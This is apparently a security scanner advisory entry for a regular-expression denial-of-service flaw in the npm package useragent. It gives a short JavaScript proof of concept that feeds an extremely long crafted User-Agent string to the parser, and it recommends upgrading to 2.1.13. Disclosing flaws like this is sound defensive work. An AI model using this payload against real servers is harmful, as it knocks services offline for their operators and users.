QID 983072
QID 983072: Nodejs (npm) Security Update for useragent (GHSA-pjmx-9xr3-82qr)
Affected versions of `useragent` are vulnerable to regular expression denial of service when an arbitrarily long `User-Agent` header is parsed.
## Proof of Concept
```
var useragent = require('useragent');
var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));
```
## Recommendation
Update to version 2.1.13 or later.
Successful exploitation of this vulnerability may affect the confidentiality, integrity, and availability of the targeted user.
Solution
Customers are advised to refer to GHSA-pjmx-9xr3-82qr for updates pertaining to this vulnerability.
Vendor References
- GHSA-pjmx-9xr3-82qr -
github.com/advisories/GHSA-pjmx-9xr3-82qr
CVEs related to QID 983072
Software Advisories
| Advisory ID | Software | Component | Link |
|---|---|---|---|
| GHSA-pjmx-9xr3-82qr | useragent |
|